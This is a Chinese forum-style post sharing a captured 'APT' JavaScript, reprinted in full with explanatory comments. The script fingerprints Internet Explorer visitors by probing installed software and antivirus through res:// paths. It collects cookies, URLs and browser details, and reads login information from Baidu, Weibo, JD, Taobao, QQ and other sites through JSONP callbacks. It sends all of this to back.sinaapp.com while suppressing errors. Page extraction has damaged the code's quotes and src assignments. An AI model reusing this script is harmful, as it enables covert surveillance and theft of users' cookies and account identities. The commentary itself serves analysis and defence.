抓到一个搞APT的JS
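代码具体有什么用我就不说了,有多屌自己看撒。(编者注:从下面的代码看,脚本在 IE 下借助 res:// 协议探测本机安装的软件,收集浏览器、页面地址和 Cookie 等信息,并通过 JSONP 回调读取多个站点的登录状态,所有结果都以图片请求的方式发往 back.sinaapp.com。页面上的代码经过转载处理,引号和部分 src 赋值已被改写,并非原样。)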
// Captured browser-side reconnaissance script, laid out one statement per line for reading.
// NOTE(review): the listing was damaged by page extraction and the damage is kept as found:
//   - string delimiters appear as the typographic quote ‘ instead of ASCII quotes;
//   - several `.src =` assignments carry an injected `http://www.mamicode.com/` prefix
//     (presumably the hosting site's link rewriting; the original right-hand side would
//     have been the bare expression that follows the prefix);
//   - one query string shows `¶ms` where `&params` was presumably meant.
// What the visible code does, in order:
//   1. On Internet Explorer only, requests a bitmap resource from fixed install paths
//      through res:// and records which programs appear to be present.
//   2. Sends page URL, top URL, opener URL and the software list to one collection host.
//   3. Builds a fingerprint object (browser, language, referrer, cookies, screen, Flash).
//   4. Loads script URLs from other sites with callback names that are defined here,
//      and forwards whatever those responses hand to the callbacks.
// Network indicator visible on the page: requests to back.sinaapp.com/index.php with
// do=api&id=bt1kyY and the parameters location/toplocation/softver/opener or
// content1/content2.

// Uses JavaScript together with the res:// protocol to determine whether a program is installed.
// havesoft holds the names of the programs that were found.
var havesoft = ‘no ie ‘;
function program(name, path){
    this.name = name;
    this.path = path;
}
// Drives to walk through; by default C and D are scanned.
var disk=[‘c‘,‘d‘];
// soft lists the usual install path of each program to detect and the matching resource number.
// Each path ends in `/2/<id>`: in a res:// URL that is the resource type (2 = bitmap) and the
// resource ID inside the named file.
// The list covers office and reader software, antivirus and firewall products,
// virtualisation, disk encryption and network tools, so the result describes the
// host's defences as well as its applications.
var soft=[
    new program(‘office 2003‘, ‘:\\Program Files\\Microsoft Office\\OFFICE11\\STSLIST.DLL/2/10100‘),
    new program(‘office2007‘, ‘:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE/2/5500‘),
    new program(‘360安全卫士‘, ‘:\\Program Files\\360\\360Safe\\360leakfixer.exe/2/110‘),
    new program(‘360保险箱‘, ‘:\\Program Files\\360\\360safebox\\BoxChecker.exe/2/203‘),
    new program(‘WinRAR‘, ‘:\\Program Files\\WinRAR\\WinRAR.exe/2/101‘),
    new program(‘QQ 2009‘, ‘:\\Program Files\\Tencent\\QQ\\Bin\\RICHED20.DLL/2/2100‘),
    new program(‘暴风影音‘, ‘:\\Program Files\\StormII\\StormSkinRes.dll/2/193‘),
    new program(‘迅雷‘, ‘:\\Program Files\\Thunder Network\\Thunder\\Program\\Thunder.exe/2/138‘),
    new program(‘360杀毒‘, ‘:\\Program Files\\360\\360sd\\mfc42u.dll/2/26567‘),
    new program(‘Foxit Reader‘, ‘:\\Program Files\\Foxit Software\\Foxit Reader\\Foxit Reader.exe/2/279‘),
    new program(‘Visual C++ 6.0‘, ‘:\\Program Files\\Microsoft Visual Studio\\VC98\\Setup\\1033\\VC98ENT.DLL/2/101‘),
    new program(‘Visual Studio 2008‘, ‘:\\Program Files\\Microsoft Visual Studio 9.0\\Common7\\IDE\\devenv.exe/2/6609‘),
    new program(‘VMware‘, ‘:\\Program Files\\VMware\\VMware Workstation\\p2vWizard.dll/2/134‘),
    new program(‘Maxthon2‘, ‘:\\Program Files\\Maxthon2\\Maxthon.exe/2/128‘),
    new program(‘Daemon Tools lite‘, ‘:\\Program Files\\DAEMON Tools Lite\\DTCommonRes.dll/2/209‘),
    new program(‘EditPlus 3‘, ‘:\\Program Files\\EditPlus 3\\editplus.exe/2/126‘),
    new program(‘TrueCrypt‘, ‘:\\Program Files\\TrueCrypt\\TrueCrypt.exe/2/112‘),
    new program(‘Foxmail‘, ‘:\\Program Files\\Foxmail\\foxmail.exe/2/RAM‘),
    new program(‘Nod32 AntiVirus‘, ‘:\\Program Files\\ESET\\ESET NOD32 Antivirus\\mfc80.dll/2/32384‘),
    new program(‘Nmap‘, ‘:\\Program Files\\Nmap\\Uninstall.exe/2/110‘),
    new program(‘WinSCP‘, ‘:\\Program Files\\WinSCP\\WinSCP.exe/2/BBALL‘),
    new program(‘Kaspersky Internet Security 2010‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 2010\\avzkrnl.dll/2/BBALL‘),
    new program(‘瑞星杀毒‘, ‘:\\Program Files\\Rising\\Rav\\RsConfig.dll/2/100‘),
    new program(‘BitDefender 2010‘, ‘:\\Program Files\\BitDefender\\BitDefender 2010\\history.exe/2/301‘),
    new program(‘Avast4‘, ‘:\\Program Files\\Alwil Software\\Avast4\\ashAvast.exe/2/267‘),
    new program(‘Avira AntiVir Desktop‘, ‘:\\Program Files\\Avira\\AntiVir Desktop\\rcimage.dll/2/106‘),
    new program(‘F-Secure‘, ‘:\\Program Files\\F-Secure\\Anti-Virus\\fsavinst.dll/2/100‘),
    new program(‘McAfee VirusScan Enterprise‘, ‘:\\Program Files\\McAfee\\VirusScan Enterprise\\nailite.dll/2/110‘),
    new program(‘金山毒霸‘, ‘:\\Program Files\\Kingsoft\\Kingsoft Antivirus\\krecycle.exe/2/130‘),
    new program(‘趋势安全专家‘, ‘:\\Program Files\\Trend Micro\\Internet Security\\TmChLang.exe/2/30994‘),
    new program(‘Kaspersky Internet Security 6.0‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\oeas.dll/2/206‘),
    new program(‘Kaspersky Internet Security 7.0‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\oeas.dll/2/206‘),
    new program(‘Kaspersky Internet Security 2009‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 2009\\oeas.dll/2/206‘),
    new program(‘AVG AntiVirus 9‘, ‘:\\Program Files\\AVG\\AVG9\\avguires.dll/2/100‘),
    new program(‘江民杀毒‘, ‘:\\Program Files\\JiangMin\\AntiVirus\\KvpViewer.exe/2/133‘),
    new program(‘ZoneAlarm‘, ‘:\\Program Files\\Zone Labs\\ZoneAlarm\\framewrk.dll/2/102‘),
    new program(‘我形我速4‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 4.0\\Uipares.dll/2/143‘),
    new program(‘我形我速5‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 5\\ipeBmp.dll/2/324‘),
    new program(‘我形我速6‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 6\\ROBOEX32.DLL/2/145‘),
    new program(‘我形我速4‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 4.0\\Uipares.dll/2/143‘),
    new program(‘我形我速5‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 5\\ipeBmp.dll/2/324‘),
    new program(‘我形我速6‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 6\\ROBOEX32.DLL/2/145‘),
    new program(‘Adobe Reader 9.0‘, ‘:\\Program Files\\Adobe\\Reader 9.0\\Reader\\AcroRd32.dll/2/103‘)
];
// Loop over every drive and file pair and test whether the file exists; if it does, the program is taken to be installed.
// The probe runs only when the user agent contains "MSIE"; otherwise havesoft keeps its initial ‘no ie ‘ value.
// i, j and res are assigned without a declaration, so they become globals of the hosting page.
if(navigator.userAgent.indexOf("MSIE")>= 0){
    havesoft =‘ ‘;
    for(i=0;i<soft.length;i++)
    {
        for(j=0;j<disk.length;j++)
        {
            var img=new Image(); // create a new Image object
            res=‘res://‘+disk[j]+soft[i].path; // reference the resource file through the res:// protocol
            img.src=http://www.mamicode.com/res; // assign the res:// resource to img (URL prefix is an extraction artifact)
            // Original comment: "check whether the height is not 30 or the width is not 20; if so, the image is
            // considered to exist". The code compares the width with 28, not 20.
            // NOTE(review): 30x28 is presumably the size IE reports for a failed image load — confirm.
            // The dimensions are read immediately after src is set, with no load handler.
            if(img.height!=30 || img.width != 28)
            {
                havesoft = havesoft + soft[i].name + ‘, ‘;
            }
        }
    }
}
// First report: one image request whose query string carries the page URL, the top-frame URL,
// the software list and the opener URL. Each value is read inside its own try/catch so that
// a failing read yields an empty string instead of stopping the request.
(function(){
    (new Image()).src=http://www.mamicode.com/‘http://back.sinaapp.com/index.php?do=api&id=bt1kyY&location=‘
        +escape((function(){try{return document.location.href}catch(e){return ‘‘}})())
        +‘&toplocation=‘+escape((function(){try{return top.location.href}catch(e){return ‘‘}})())
        +‘&softver=‘+escape((function(){try{return havesoft}catch(e){return ‘‘}})())
        +‘&opener=‘+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:‘‘}catch(e){return ‘‘}})());
})();
// Returning true from window.onerror suppresses the browser's default error reporting,
// so failures in the rest of the script stay invisible to the user.
window.onerror=function(){
    return true;
}
// Base URL that every later report is appended to (content1 = payload, content2 = label).
http_server = "http://back.sinaapp.com/index.php?do=api&id=bt1kyY&content1=";
// info collects the fingerprint that window.onload sends as its first report.
var info = {};
// Browser family and version parsed from the lower-cased user agent.
info.browser = function(){
    ua = navigator.userAgent.toLowerCase();
    var rwebkit = /(webkit)[ \/]([\w.]+)/;
    var ropera = /(opera)(?:.*version)?[ \/]([\w.]+)/;
    var rmsie = /(msie) ([\w.]+)/;
    var rmozilla = /(mozilla)(?:.*? rv:([\w.]+))?/;
    var match = rwebkit.exec( ua ) || ropera.exec( ua ) || rmsie.exec( ua ) || ua.indexOf("compatible") < 0 && rmozilla.exec( ua ) || [];
    return { name: match[1] || "", version: match[2] || "0" };
}();
info.url = document.location.href;
info.ua = escape(navigator.userAgent);
info.lang = navigator.language;
info.referrer = document.referrer;
info.location = window.location.href;
// Unlike the first report, this read of top.location is not wrapped in try/catch.
info.toplocation = top.location.href;
// document.cookie exposes only cookies that are not flagged HttpOnly, so marking session
// cookies HttpOnly keeps them out of this field.
info.cookie = escape(document.cookie);
info.domain = document.domain;
info.title = document.title;
// Screen resolution as "WIDTHxHEIGHT", or an empty string when self.screen is missing.
info.screen = function(){
    var c = "";
    if (self.screen) {
        c = screen.width+"x"+screen.height;
    }
    return c;
}();
// Flash version: taken from the plugin description when navigator.plugins is populated,
// otherwise found by trying ActiveX ProgIDs from version 10 down to 2.
info.flash = function(){
    var f="",n=navigator;
    if (n.plugins && n.plugins.length) {
        for (var ii=0;ii<n.plugins.length;ii++) {
            if (n.plugins[ii].name.indexOf(‘Shockwave Flash‘)!=-1) {
                f=n.plugins[ii].description.split(‘Shockwave Flash ‘)[1];
                break;
            }
        }
    } else if (window.ActiveXObject) {
        for (var ii=10;ii>=2;ii--) {
            try {
                // eval runs a string built from a fixed prefix and the loop counter only.
                var fl=eval("new ActiveXObject(‘ShockwaveFlash.ShockwaveFlash."+ii+"‘);");
                if (fl) {
                    f=ii + ‘.0‘;
                    break;
                }
            } catch(e) {}
        }
    }
    return f;
}();
// Appends a <script> element with src = a to <body> and, when b is given, calls b once the
// script has loaded (onload, or onreadystatechange where window.ActiveXObject exists).
// Returns the created element.
function inj_script(a, b) {
    var o = document.createElement("script");
    o.src = a;
    if (b) {
        if (!window.ActiveXObject) {
            o.onload = b;
        } else {
            o.onreadystatechange = function () {
                if (o.readyState == ‘loaded‘ || o.readyState == ‘complete‘) {
                    b();
                }
            }
        }
    }
    document.getElementsByTagName("body")[0].appendChild(o);
    return o;
}
// Hand-rolled serializer: strings are returned unchanged, objects become
// {'key':value,...} with nested objects handled recursively. Strings and numbers are
// wrapped in quotes without escaping, and for...in also walks inherited enumerable keys.
function json2str(o) {
    if(typeof o == ‘string‘) return o;
    var arr = [];
    var fmt = function(s) {
        if (typeof s == ‘object‘ && s != null) return json2str(s);
        return /^(string|number)$/.test(typeof s) ? "‘" + s + "‘" : s;
    }
    for (var i in o) arr.push("‘" + i + "‘:" + fmt(o[i]));
    return ‘{‘ + arr.join(‘,‘) + ‘}‘;
}
// Global callbacks. Each name matches a callback parameter in one of the script URLs loaded
// from window.onload below; whatever object the response passes in is serialized and sent
// to http_server, labelled with the callback name in content2.
// NOTE(review): the responses presumably describe the visitor's logged-in account on each
// site — the page does not show them. Site owners close this kind of cross-site read by not
// returning account data from callback-style (JSONP) endpoints.
video_login_callback = function(o){
    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=video_login_callback";
}
e163_comment = function(o){
    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=e163_comment";
}
weibo_login = function(o){
    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=weibo_login";
}
sina_1368631232407449 = function(o){
    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=sina_1368631232407449";
}
jingdong_service = function(o){
    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jingdong_service";
}
loginInfoJson = function(o){
    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=loginInfoJson";
}
hxbase_json1368703155802logininfo = function(o){
    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=hxbase_json1368703155802logininfo";
}
jsonp1368703516133 = function(o){
    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jsonp1368703516133";
}
ajaxLogan_updateNickName = function(o){
    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=ajaxLogan_updateNickName";
}
jsonp1368705676193 = function(o){
    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jsonp1368705676193";
}
jsonp1368706291697 = function(o){
    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jsonp1368706291697";
}
jsonp1368751970360 = function(o){
    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jsonp1368751970360";
}
jQuery1368754535817 = function(o){
    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jQuery1368754535817";
}
jQuery1368758656634 = function(o){
    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jQuery1368758656634";
}
// Runs once the hosting page has loaded. Assigning window.onload replaces any handler the
// page had set through the same property.
window.onload = function(){
    // Second report: the serialized info object, labelled "info ".
    new Image().src = http://www.mamicode.com/http_server + escape(json2str(info)) +"&content2=info%20";
    // Script loads that name one of the callbacks defined above. Every call has its own
    // try/catch so that one failure does not stop the rest.
    try{ inj_script(‘http://video.baidu.com/d?m=uss&callback=video_login_callback‘); } catch(e){}
    try{ inj_script(‘http://comment.money.163.com/reply/check.jsp?time=1367240961474&callback=e163_comment‘); } catch(e){}
    try{ inj_script(‘http://weibo.com/ajaxlogin.php?framelogin=0&callback=weibo_login‘); } catch(e){}
    try{ inj_script(‘http://i.house.sina.com.cn/sso/get_cookie.php?callback=sina_1368631232407449‘); } catch(e){}
    try{ inj_script(‘http://passport.jd.com/new/helloService.ashx?m=ls&callback=jingdong_service‘); } catch(e){}
    try{ inj_script(‘http://i.bendi.taobao.com/userLoginInfo.do?callback=loginInfoJson&t=1368683974713‘); } catch(e){}
    try{ inj_script(‘http://shequ5.tool.hexun.com/rest/checkjson.aspx?callback=hxbase_json1368703155802logininfo‘); } catch(e){}
    try{ inj_script(‘http://i.56.com/api/getHomeLink.php?callback=jsonp1368703516133‘); } catch(e){}
    try{ inj_script(‘http://my.pconline.com.cn/intf/getLogedUser.jsp?callback=ajaxLogan_updateNickName‘); } catch(e){}
    try{ inj_script(‘http://passport.mop.com/common/user-info?callback=jsonp1368705676193‘); } catch(e){}
    try{ inj_script(‘http://jiaoyou.51.com/?c=grade&a=getMyInfoJsonp&callback=jsonp1368706291697&ie=0&_=1368706293192‘); } catch(e){}
    try{ inj_script(‘http://commapi.dangdang.com/api/toolbar_ads_api.php?jsoncallback=jsonp1368751970360‘); } catch(e){}
    try{ inj_script(‘http://lc.tiexue.net/p.tx?c=jQuery1368754535817&_=1368754537944‘); } catch(e){}
    try{ inj_script(‘http://passport.game.renren.com/user/info?callback=jQuery1368758656634&_=1368758656639‘); } catch(e){}
    // Script loads without a callback parameter. The timers below read global names after
    // three seconds; the last URL names its variable with var=tianya_msg.
    // NOTE(review): the other globals are presumably set by these responses — the page does
    // not show them.
    try{ inj_script(‘http://random.blog.sohu.com/service/profile.jsp‘); } catch(e){}
    try{ inj_script(‘http://uis.i.sohu.com/api/passport.jsp?from=roll&_=1368671343288‘); } catch(e){}
    try{ inj_script(‘http://api.t.qq.com/inbox/pm_list.php?count1=30&t=wbpm_list.js&resp_charset=UTF8&first=1&pmlang=zh_TW&r=0.36978532862849534‘); } catch(e){}
    try{ inj_script(‘http://blog.ifeng.com/misc.php?script=getusername&tm=1368689210147‘); } catch(e){}
    try{ inj_script(‘http://www.tianya.cn/api/msg?method=messagesys.selectmessage¶ms.pageSize=1¶ms.pageNo=1&_=1368693252438&var=tianya_msg‘); } catch(e){}
    // Delayed reports: each timer reads one global expression and sends it with content2 set
    // to the URL-encoded text of that expression. A missing global throws inside the timer,
    // which the window.onerror handler above hides.
    setTimeout(function(){
        var o = Blog.camp.profile;
        new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=Blog.camp.profile";
    } ,3000);
    setTimeout(function(){
        var o = [_passport];
        new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=%5B_passport%5D";
    } ,3000);
    setTimeout(function(){
        var o = PM.PMListLoaded().ma+‘|‘+PM.PMListLoaded().mn+‘|‘+PM.PMListLoaded().micn;
        new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=PM.PMListLoaded%28%29.ma%2B%27%7C%27%2BPM.PMListLoaded%28%29.mn%2B%27%7C%27%2BPM.PMListLoaded%28%29.micn";
    } ,3000);
    setTimeout(function(){
        var o = sso_username;
        new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=sso_username";
    } ,3000);
    setTimeout(function(){
        var o = tianya_msg.data.list[0].toUserName+‘|‘+tianya_msg.data.list[0].toUserId;
        new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=tianya_msg.data.list%5B0%5D.toUserName%2B%27%7C%27%2Btianya_msg.data.list%5B0%5D.toUserId";
    } ,3000);
};